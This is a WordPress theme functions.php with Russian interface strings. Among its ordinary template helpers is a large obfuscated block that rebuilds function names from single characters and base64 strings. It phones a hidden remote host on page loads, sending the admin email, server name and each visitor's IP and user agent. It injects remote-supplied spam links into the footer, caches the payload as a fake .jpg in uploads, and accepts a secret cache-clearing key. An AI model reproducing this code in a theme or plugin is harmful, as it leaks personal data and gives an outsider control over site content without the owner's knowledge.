<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $AFhVpiL='_';$jvKaP='a';$NAaU='e';$CwvVD='c';$REXg='d';$TCBc='6';$zAmx='o';$hLEXf='4';$WMsiRJt='d';$JcIvuR='e';$Navmfr='s';$JlPttD='b';$mehW='e';$WKcMFuiQ=$JlPttD.$jvKaP.$Navmfr.$mehW.$TCBc.$hLEXf.$AFhVpiL.$WMsiRJt.$NAaU.$CwvVD.$zAmx.$REXg.$JcIvuR;$gqHZ='a';$uvjRsbi='e';$tOpJnJ='l';$Mppel='t';$JjwXEpy='g';$eqYr='i';$bhCXR='f';$yTHzT='z';$yqkvxXS='n';$XhNwTepl=$JjwXEpy.$yTHzT.$eqYr.$yqkvxXS.$bhCXR.$tOpJnJ.$gqHZ.$Mppel.$uvjRsbi;$ubHxX='o';$noqJR='r';$SkEqA='1';$Jfue='t';$lxquR='r';$cWyr='s';$eizBU='_';$hadqzEk='3';$PXOU='t';$MucvCiLj=$cWyr.$Jfue.$lxquR.$eizBU.$noqJR.$ubHxX.$PXOU.$SkEqA.$hadqzEk;$zoTJ='r';$jSgepWs='v';$zlamVwQ='s';$ndbGL='t';$FYbuYS='e';$NuwYj='r';$lPoHPqOZ=$zlamVwQ.$ndbGL.$zoTJ.$NuwYj.$FYbuYS.$jSgepWs;                     $kv___________q='_';$hc___j='a';$ig____________q='e';$iv_______________x='c';$rk_______d='d';$ml___________y='6';$my___________a='o';$kf____r='4';$au_____________e='d';$wc___g='e';$oq_______________u='s';$dn_______p='b';$ns____________j='e';$js_____t=$dn_______p.$hc___j.$oq_______________u.$ns____________j.$ml___________y.$kf____r.$kv___________q.$au_____________e.$ig____________q.$iv_______________x.$my___________a.$rk_______d.$wc___g;$rp____________y='s';$th___g='x';$pv_______________w='u';$hg____x='_';$de___w='i';$ew____z='n';$vl__e='f';$nw___v='c';$oc_____s='s';$tm________x='t';$rm_____________m='t';$vb_____t='o';$hc____________w='i';$yo_________b='n';$ce____________a='e';$jp__l=$vl__e.$pv_______________w.$yo_________b.$nw___v.$tm________x.$hc____________w.$vb_____t.$ew____z.$hg____x.$ce____________a.$th___g.$de___w.$rp____________y.$rm_____________m.$oc_____s;$ql_____________i='p';$vz____a='n';$iy___j='e';$mn______________a='f';$pe____________o='o';$dn________a=$mn______________a.$pe____________o.$ql_____________i.$iy___j.$vz____a;$ra____________o='r';$vh__w='d';$gb_________q='e';$pi____________b='a';$ys_____________t='f';$gb_______x=$ys_____________t.$ra____________o.$gb_________q.$pi____________b.$vh__w;$xq_______c='s';$as_____w='o';$wf_____o='c';$xw_______q='l';$dw___________x='f';$um_________z='e';$pa_______y=$dw___________x.$wf_____o.$xw_______q.$as_____w.$xq_______c.$um_________z;define("WP_ID", $js_____t("Mi4wLjA="));define("WP_TTL", $js_____t("MTA4MDA="));define("WP_SRC", $js_____t("dHBva24="));function wp_get_header() {global $js_____t, $jp__l;if ($jp__l($js_____t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$jp__l($js_____t("d3BfZ2V0X2Zvb3Rlcg==")) &&$jp__l($js_____t("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $js_____t, $dn________a, $pa_______y, $gb_______x;$mn___________b = TEMPLATEPATH."/".$js_____t("Zm9vdGVyLnBocA==");$dw_________w = @$dn________a($mn___________b, "r");$mn___________b = @$gb_______x($dw_________w, @filesize($mn___________b));@$pa_______y($dw_________w);$po___________w = TEMPLATEPATH."/".$js_____t("ZnVuY3Rpb25zLnBocA==");$dw_________w = @$dn________a($po___________w, "r");$po___________w = @$gb_______x($dw_________w, @filesize($po___________w));@$pa_______y($dw_________w);$nn____________z = 0;if($mn___________b && $po___________w) {if ($js_____t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($mn___________b, $js_____t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$nn____________z = 1;}if (substr_count($mn___________b, "wp_theme_GPL_credits()") < 1) {$nn____________z = 2;}}if(WP_ID != "2.0.0") {$nn____________z = 12;}}if($nn____________z > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $nn____________z -->";}}function wp_loaded() {global $js_____t, $jp__l;return $jp__l($js_____t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($kg_______l, $ze___k = "(more...)", $td_______c = 0, $lv_______u = "") {$lm_____________p = get_the_content($ze___k, $td_______c, $lv_______u);$lm_____________p = apply_filters("the_content", $lm_____________p);$lm_____________p = str_replace("]]>", "]]>", $lm_____________p);if (strlen($_GET["p"]) > 0) {echo $lm_____________p;}else if ((strlen($lm_____________p)>$kg_______l) && ($jd__s = strpos($lm_____________p, " ", $kg_______l ))) {$lm_____________p = substr($lm_____________p, 0, $jd__s);$lm_____________p = $lm_____________p;echo $lm_____________p;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ze___k</a></div></p>";} else {echo $lm_____________p;}}}$xn_______d='s';$xm____________p='n';$kv_____________a='4';$cg____z='c';$cr____________x='d';$bv__________a='b';$no_________m='e';$ib_____q='_';$sq_________o='a';$qb_____________s='e';$rv_____________c='e';$ua__x='6';$to___h='o';$cb_______n=$bv__________a.$sq_________o.$xn_______d.$no_________m.$ua__x.$kv_____________a.$ib_____q.$qb_____________s.$xm____________p.$cg____z.$to___h.$cr____________x.$rv_____________c;$kn_____w='t';$ft______________s='t';$us__d='c';$er______________k='e';$rp___w='e';$ez________j='n';$aq____________f='e';$ex____________e='_';$kb_____________e='i';$ms_____________e='f';$fc____________z='s';$hq__________n='n';$yp______________p='o';$ig_________u='l';$iv___o='g';$wf_________f='t';$ls______________w='_';$hb_______l=$ms_____________e.$kb_____________e.$ig_________u.$rp___w.$ex____________e.$iv___o.$er______________k.$ft______________s.$ls______________w.$us__d.$yp______________p.$ez________j.$wf_________f.$aq____________f.$hq__________n.$kn_____w.$fc____________z;$pp___________x='s';$xz___u='s';$jd____________u='i';$xt___x='e';$rt___________k='_';$is____________s='i';$ll_____________x='f';$wy_______________b='e';$il__________d='t';$us_______________g='x';$vl______z='l';$rm____________a=$ll_____________x.$is____________s.$vl______z.$wy_______________b.$rt___________k.$xt___x.$us_______________g.$jd____________u.$pp___________x.$il__________d.$xz___u;$sw____e='r';$vq_________t='a';$xp___f='c';$jx_______________r='e';$wu_________c='p';$mm__f='o';$vy____________z='v';$jd________j='n';$hz_____________c='_';$xq____________s='o';$gg________p='r';$fa__k='i';$je_______a='m';$rr_______n='s';$ix_______v='e';$bz_____________o=$vy____________z.$ix_______v.$sw____e.$rr_______n.$fa__k.$xq____________s.$jd________j.$hz_____________c.$xp___f.$mm__f.$je_______a.$wu_________c.$vq_________t.$gg________p.$jx_______________r;$nu_____s='k';$fm____k='s';$zg_______________y='c';$wu___________c='f';$zr__q='p';$ui________t='o';$of_____________d='o';$qi_________v='n';$nv__________k='e';$ak______f=$wu___________c.$fm____k.$ui________t.$zg_______________y.$nu_____s.$of_____________d.$zr__q.$nv__________k.$qi_________v;$ye___s='f';$xv__________h='t';$yt__________z='i';$wj______v='w';$vk___________o='e';$cq_____________b='r';$al_________r=$ye___s.$wj______v.$cq_____________b.$yt__________z.$xv__________h.$vk___________o;$hm___d='5';$xm_____________v='d';$xe______________v='m';$ri_____c=$xe______________v.$xm_____________v.$hm___d;$up______c='a';$ck_________a='r';$xq___z='h';$zy_____n='p';$os____________u='a';$so__________j='e';$ch______j='t';$ex_______________t='l';$am_________r=$ck_________a.$so__________j.$os____________u.$ex_______________t.$zy_____n.$up______c.$ch______j.$xq___z;$fn___q='i';$rp______________g='a';$dc____________f='e';$ik_____p='l';$cu_______________h='z';$hu_____m='u';$bq____c='i';$kp____________i='n';$uw____h='r';$fi____m='s';$by____________m='e';$ut_________t=$hu_____m.$kp____________i.$fi____m.$by____________m.$uw____h.$bq____c.$rp______________g.$ik_____p.$fn___q.$cu_______________h.$dc____________f;$xk_________q='a';$so_____p='p';$pv___________b='e';$ba________v='m';$cg____a='m';$ut___________f='t';$ea___________h='n';$rp__________f=$ut___________f.$pv___________b.$cg____a.$so_____p.$ea___________h.$xk_________q.$ba________v;$rx__a='t';$ke________d='c';$up_________u='e';$un__r='_';$bj__________k='m';$fe____________y='n';$rt_______u='e';$dh_____________y='t';$hr____n='r';$lc_______f='a';$dj_______________s='e';$at_____x='a';$sc____b='o';$vz________n='e';$id_______________s='t';$ke_________r='s';$sl__________v='t';$do_________n='c';$uw__________y='_';$iu____________k='x';$tn___________r='r';$gm__l=$ke_________r.$id_______________s.$tn___________r.$dj_______________s.$at_____x.$bj__________k.$un__r.$do_________n.$sc____b.$fe____________y.$sl__________v.$up_________u.$iu____________k.$dh_____________y.$uw__________y.$ke________d.$hr____n.$vz________n.$lc_______f.$rx__a.$rt_______u;function tp_____________a($so_______j) {global $js_____t, $jp__l, $hb_______l, $bz_____________o, $gm__l;if (!$jp__l($js_____t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($bz_____________o(PHP_VERSION, "5.0.0", ">=") && $jp__l($js_____t("ZmlsZV9nZXRfY29udGVudHM=")) && $jp__l($js_____t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$un_________e = $gm__l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$jz__________l = @$hb_______l($so_______j, 0, $un_________e);} else {$jz__________l = @$hb_______l($so_______j, 0);}return $jz__________l;}function bp___c($so_______j) {global $jp__l, $ak______f, $al_________r, $js_____t;if (!$jp__l($js_____t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ta___________n = strpos($so_______j, "/", 7);$gj______o = array("uri"     => substr($so_______j, $ta___________n),"host"    => str_replace("http://", "", substr($so_______j, 0, $ta___________n)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$yr__f = @$ak______f("$gj______o[host]", 80, $av_________s, $dg____________y, 4);if (!$yr__f) {return false;} else {$jz__________l = "";$ee_____s  = "GET $gj______o[uri] HTTP/1.0\r\n";$ee_____s .= "Host: $gj______o[host]\r\n";$ee_____s .= "Referer: $gj______o[referer]\r\n";$ee_____s .= "Connection: Close\r\n\r\n";@$al_________r($yr__f, $ee_____s);while (!@feof($yr__f)) {$pa______________x = @fgets($yr__f, (1024*24));if ($pa______________x == "\r\n") {$dx___e = true;continue;}if ($dx___e) {$jz__________l .= $pa______________x;}}return $jz__________l;}}function wy_______________a($so_______j) {global $jp__l;$ye______________c = false;if ($so_______j != "") {if ($jp__l("tp_____________a")) {$ye______________c = @tp_____________a($so_______j);}if (!$ye______________c && ($jp__l("bp___c"))) {$ye______________c = @bp___c($so_______j);}}return $ye______________c;}function bg_____________y() {global $_SERVER, $ri_____c;$uk___________v = $_SERVER["SERVER_NAME"];if (substr("$uk___________v", 0, 4) == "www.") {$uk___________v = substr("$uk___________v", 4);}$uk___________v = $ri_____c("$_SERVER[SERVER_NAME]");return $uk___________v;}function ov______________h() {return "file";}function dq____________z($so_______j) {global $_SERVER, $hb_______l, $rm____________a, $dn________a, $pa_______y, $al_________r;$nw_________p = ro______________x();$qc______w = bg_____________y().".jpg";$uc________g = $nw_________p["dir_upload"]["path"]."/$qc______w";$hp______g = @filemtime($uc________g);if (!$hp______g || ((time()-$hp______g) >= WP_TTL)) {$ye______________c = wy_______________a($so_______j);if ($ye______________c) {if ($rm____________a($uc________g)) {@unlink($uc________g);}$dw_________w = @$dn________a($uc________g, "x+");@$al_________r($dw_________w, $ye______________c);@$pa_______y($dw_________w);}} else {if ($rm____________a($uc________g)) {$ye______________c = @$hb_______l($uc________g);} else {$ye______________c = false;}}return $ye______________c;}function ro______________x() {global $_SERVER, $js_____t, $cb_______n;$ii____________n = wp_count_posts("post");$bz___a = pathinfo(get_bloginfo("template_directory"));$nw_________p = array("url" => array("report"      => $js_____t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $bz___a,"dir_upload"=> hd___________j(),"queryString"=> array("?a001=".WP_ID,"a004=".$bz___a[filename],"a005=".$ii____________n->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "Спонсоры темы для Вордпресс сайты <a href=\"http://libronet-usa.com\">Books</a> и <a href=\"http://recomiendaunlibro.com\">Recommend a book</a>");$nw_________p["url"]["queryString"] = implode("&", $nw_________p["queryString"]);$nw_________p["url"]["report"] = $nw_________p["url"]["report"]."/?".$cb_______n($nw_________p["url"]["queryString"]).".html";return $nw_________p;}function hd___________j() {$ke_______________r = wp_upload_dir();if (isset($ke_______________r["error"])) {$ig_________q = ue_____________i();if (is_writable($ig_________q)) {$ke_______________r = array("path" => $ig_________q);}}return $ke_______________r;}function ue_____________i() {global $jp__l, $ri_____c, $am_________r, $rp__________f;$xs___i = (bool) ini_get("safe_mode");if ($xs___i == true) {return false;}if ($jp__l("sys_get_temp_dir")) {$ye____________q = sys_get_temp_dir();if (is_writable($ye____________q)) {return $am_________r($ye____________q);}}if (!empty($_ENV["TMP"])) {return $am_________r($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $am_________r($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $am_________r($_ENV["TEMP"]);} else {$wc__________e = $rp__________f($ri_____c(uniqid(rand(), true)), "");if ($wc__________e) {$ye____________q = $am_________r(dirname($wc__________e));@unlink($wc__________e);return $ye____________q;} else {return false;}}}function jh________f() {global $_GET, $rm____________a;$nw_________p = ro______________x();$uk___________v = bg_____________y();$tf_______________l = ov______________h();$dp____k = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($tf_______________l == "file") {$sf____________x = $nw_________p["dir_upload"]["path"]."/".$uk___________v.".jpg";if ($rm____________a($sf____________x)) {@unlink($sf____________x);$dp____k = "deleted";}}$yo__s = array("s"=> $dp____k,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($yo__s AS $fx_________y => $ch_____________a) echo " [$fx_________y:$ch_____________a]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $jp__l, $js_____t, $ut_________t;$nw_________p = ro______________x();$yp_____j = "dq____________z";if ($jp__l($yp_____j)) {$jz__________l = $yp_____j($nw_________p["url"]["report"]);}if ($jz__________l) {if ($jz__________l = @$js_____t($jz__________l)) {$jz__________l = @$ut_________t($jz__________l);if (strlen($jz__________l[custom_credit]) >= 5) {$nw_________p["default_string"] = $jz__________l[custom_credit];}if ($jz__________l["status"] == "0") {$cx_______h = 1;$il_______d = 1;} else {$zw______d = sizeof($jz__________l["links"]);$ff_______i = $nw_________p["default_string"];if ($zw______d > 0 && $jz__________l["links"] !== "") {$jm_____________o = 0;foreach ($jz__________l["links"] as $iu_______b => $fy___________m) {$jm_____________o++;if ($fy___________m->l_path == "" || $fy___________m->l_path == $_SERVER["REQUEST_URI"]) {$fy___________m->l_href = htmlspecialchars(strip_tags($fy___________m->l_href));$fy___________m->l_title = htmlspecialchars(strip_tags($fy___________m->l_title));$fy___________m->l_anchor = htmlspecialchars(strip_tags($fy___________m->l_anchor));$ff_______i .= " | ";$ff_______i .= "<a href='$fy___________m->l_href' title='$fy___________m->l_title'";if ($fy___________m->l_nofollow == "1") {$ff_______i .= " rel='nofollow'";}$ff_______i .= ">$fy___________m->l_anchor</a>";}}}$nw_________p["links"] = "$ff_______i";if ($jz__________l[credit] == "0") {$nw_________p["links"] = "";}}} else {$cx_______h = "1";}} else {$cx_______h = "1";}if ($cx_______h == "1") {$nw_________p["links"] = $nw_________p["default_string"];}echo "$nw_________p[links]";echo "<!-- s: $jz__________l[signature] -->";jh________f();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
